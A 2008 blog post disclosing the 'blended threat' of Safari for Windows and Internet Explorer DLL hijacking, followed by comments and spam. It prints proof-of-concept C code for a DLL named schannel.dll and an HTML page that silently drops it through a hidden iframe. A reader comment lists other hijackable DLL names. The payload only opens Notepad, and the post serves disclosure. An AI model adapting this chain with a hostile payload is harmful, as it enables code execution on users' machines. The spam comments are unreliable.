Design Flaw in Windows Internet Explorer Allows Remote Code Execution From Safari for Windows

Summary of What Happened
Nitesh Dhanjani discovered that Safari for Windows puts downloads automatically to Desktop and argued this can potentially make a mess of Desktop, naming it the effect of "Safari Carpet Bomb". Later Microsoft issued an advisory stating "remote code execution on all supported versions of Windows XP and Windows Vista" and "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". Aviv Raff posted on his blog "Safari pwns Internet Explorer", clarifying "this combined attack also exploits an old vulnerability in Internet Explorer that I've already reported to them a long long time ago".

Technical Details of This Incident

The old vulnerability that Aviv Raff reported to Microsoft long time ago is described in two articles by Aviv Raff: IE7 DLL-load hijacking Code Execution Exploit PoC, and Internet Explorer 7 - Still Spyware Writers Heaven, both dating back to 2006(yeah that's really "a long long time ago"). This vulnerability lies in Windows Internet Explorer loading program library files(DLL) from user's Desktop instead of its own library file folder(usually C:\WINDOWS\SYSTEM32), when filenames are set to some specific values.

Safari for Windows downloads files to Desktop by default with no confirmation - which is a quite reasonable and convenient feature. And Windows Internet Explorer loads program library(DLL) from Desktop if the filename is set to some specific value. Two things added up, or "blended", IE loads library file downloaded by Safari. The action of loading library runs code in the library file, and loading the wrong file results in executing the wrong code.

Proof of Concept Code
----------dll.c----------
#include <windows.h>

BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi,sizeof(pi));

CreateProcess(NULL,"NOTEPAD \"=====(((((we are in)))))=====\"",NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}



Compile by cl /LD dll.c and rename the generated DLL file to "schannel.dll"

----------index.html----------

<html><head>
<title>Safari for Windows Proof of Concept (Incident in June 2008)</title>
</head><body>
Safari for Windows Proof of Concept (Incident in June 2008)<br>
<br>
<a href="http://liudieyu0.blog124.fc2.com/blog-entry-1.html">Detailed Analysis Available on My Blog ...</a><br>
<br>
Step 1. Browse this web page with Safari for Windows, and download is copied to Desktop.
It's a legitimate feature.<br>
<iframe src="schannel.dll" width=1 height=1></iframe><br>
Step 2. Now launch Internet Explorer from Desktop or Start Menu, and code from the DLL file is executed.
<i>This is the issue.</i><br>
<br>
Note:<br>
Code in the DLL file launches NOTEPAD to open a file that doesn't exist.<br>
Please remove the downloaded DLL file on Desktop after testing.<br>
</body></html>

Live Demo
http://liudieyu.com/iesafari200806.2885391780966027/

Final Words on This
A design flaw in Windows Internet Explorer, version 8 beta, 7, and probably others, breaks the security of Safari for Windows shipped by Apple. The problem originated from an error that Windows Internet Explorer will load some program library files(DLL) from user's Desktop instead of its own library file folder(usually C:\WINDOWS\SYSTEM32). Apple's Safari for Windows downloads and saves requested file to user's Desktop by default - this default behavior itself does not constitute a mistake. Microsoft used some vague wording in the advisory: "Suggested Actions" are "Restrict use of Safari as a web browser ...", as if it's a flaw rooted in Safari.

In sub-folder of "Suggested Actions" Microsoft admits "Workarounds" as "Change the download location of content in Safari to a newly created directory". The full statement should be "Change the download location of content in Safari to a newly created directory(to save the integrity of Windows Internet Explorer)".

PS:
I'm not an Apple fan, in fact I applied for their position of Safari for Windows Tester and they never replied. It's not so lame, cause they don't even get back to reporters when the whole world is accusing their product - "An Apple spokesman did not return a phone call and e-mail seeking comment".

I believe in time all things come to light.

trackback


この記事にトラックバックする(FC2ブログユーザー)

Technical Details of Security Issues Regarding Safari for Windows

LIUDIEYU wrote in Bugtraq: A New Security Issue in Safari for Windows, NOT the "Blended Threat"

domain name info

There are two common methods of tracking, Cookie/ Session Tracking and IP Tracking. Cookie tracking is by far the most widely used and most reliable. We have all heard about Cookies in our Internet browsing experience, the site visited or advert displa...

online News

server dat drukt, radio wi- FI ontvangt punt en firewall.

workstation risk assessment

safety assessment

T-Rex

HTML 5 allows connections across domains, through use of the Access- Control HTTP header, as defined in a separate W3C specification (which applies identically to normal XHR usage and to server- sent events). A request is made for a resource as usual, ...

riverbed wan optimization

We already saw the Diamond and Omnia in action and you’ re free to replay the game here. The Diamond surely has a few things to offer over the Omnia (VGA screen, smaller size, 3D acceleration, and magnetic stylus) but it also has its issues here and ...

Kostenloser WEB Space hier gleich finden...

There are nuances to the whole copy scenario. For some reason it is seen as acceptable to make a video copy of your favorite television program for later enjoyment as long as you copy it from television. Isn’ t this an extension of your memory in tim...

T-Rex

Of course, you can always change your name (though not that easily) , but typically the name you\\\'re born with, is the name your stuck with.

Natural Male Enhancement Pills

Wow, I normally just run across junk and a bunch of mess in this industry, but this is a really good page with some informative info, keep it up.

Caralluma fimbriata Extract Fat Burner

In this niche it\'s hard to find some good content because of all the junk I run into but this is a really good page with a lot of relevant things people would like to know about. Good job and keep it going.

credit fixers

If you were to ask any financial expert whether or not you need to check you credit report, chances are they will tell you it is essential information to check up on at least once a year. The average person, however, has never checked their score and i...

comment

管理者にだけメッセージを送る

Please read the advisory again

If you had read through the MS advisory, you might have saved yourself some work.

It says under FAQs "A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed."

And in the summary (above all the folders) it also says -

"Mitigating Factors: Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat."

And they also restate this in the Workarounds section (as you pointed out).

It is a "blended" threat so by definition Safari is only part of the problem. From what I gather Safari downloads files WITHOUT prompting, which is not a secure default setting.

"A design flaw in Windows Internet Explorer, version 8 beta, 7, and probably others"

Hello Liu,

It's not a design fault in Internet Explorer: it is a design fault in the core windows OS. LoadLibrary searches the current working directory by default, and in some configurations places it ahead of %SysDir% in the search order. It is this fundamental insecurity in the dll search path that is the root cause of the risk.

When launching any application from Windows Explorer, the current working directory is always the desktop, and that's why the bogus schannel dll gets loaded; on the other hand, you could have called it kernel32.dll and then it should get launched immediately you start /any/ application from the Explorer shell.

Have you tried this in conjunction with SafeDllSearchMode?

you must credit aviv raff

even ms credited him.
he had given screenshot
http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx
which easily links to
http://milw0rm.org/exploits/2929
clearly sayin:


Compile and upload to the victim's desktop as one of the following hidden DLL files:
- sqmapi.dll
- imageres.dll
- schannel.dll

Run IE7 and watch the nice calculators pop up.

about time

you came back to life

FF is better, because..

FF is better, because it asks if download this dll by default.

MS

Microsoft sucks so hard.

There is nothing wrong with Safari. User desktop is a place where any file could be stored, and this cannot affect OS's security.

IE is such a crap. I pity idiots who still use it.

i agree with michael evanchik

about time you came back to life liu die yu.

No title

awsmm man!!the code works and its great!!..cant believe tht using safari and ie together cud open up my pc the the world..

can not reproduce

Can't reproduce the issue with IE7 on Vista.

The dll from the POC-demo-site is on the Desktop but no notepad appears upon opening iexplore.
When debugging iexplore with ollydbg, the dll on the desktop is not in the executable modules list, instead
Executable modules, item 66
Base=75840000
Size=00045000 (282624.)
Entry=758416D9 schannel.<ModuleEntryPoint>
Name=schannel (system)
File version=6.0.6000.16508 (vista_gdr.07061
Path=C:Windowssystem32schannel.dll
is used.....

No title

this is not a internet explorer on safari issue

it is a general windows issue. every program on windows looks for dlls firstly in the current working directory.

insecure by design

Only the administrator may view.

Only the administrator may read this comment.

munk is talking out of his arse

This is not a windows issue. Any browser downloading files (and I don't mean into the cache of the browser) without consent is inherently insecure, no matter what the Mac fanboys say.

Only the administrator may view.

Only the administrator may read this comment.

No title

it is a general windows issue.

Thanks

Hi, thanks for your great post. Very nice and useful.

No title

競馬をするにもまずは予想サイトから!
驚異の的中率を誇る競馬投資術サイトです!
競馬必勝投資術
http://www.freepe.com/i.cgi?keibahissyou

Only the administrator may view.

Only the administrator may read this comment.

No title

Job Opportunity Calgary Extremely Big http://darrio.yourfreehosting.net/ceard.html com

No title

<a href="http://ect10.lopy.biz">アダルトチャット</a>
<a href="http://www.freepe.com/i.cgi?ect11">アダルトチャット</a>
<a href="http://pksp.jp/ect12/">アダルトチャット</a>

Best Penis Enlargement Product Reviews

Want Enlarge Your Penis Fast and Safe?

Order The BEST Penis Enlargement Pills NOW

Vimax - 100% safe and natural penis enlargement!
Just a few weeks and your woma'll thank you!
Attention! Special Offers only this week! Check it NOW!

Look at Penis Enlargement pills prices HERE. HUGE DISCOUNT!

more information : http://www.penisenlargement4male.com

No title

Microsoft sucks so hard - it is fukin.... true.. thanks

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Only the administrator may view.

Only the administrator may read this comment.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Only the administrator may view.

Only the administrator may read this comment.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.

Comment is pending approval.

Comment is pending administrator's approval.
Profile

Author:Liu Die Yu
Welcome to FC2

Links
New Post
New Comment
New Trackback
Monthly Archive
Category
Search
RSS Feed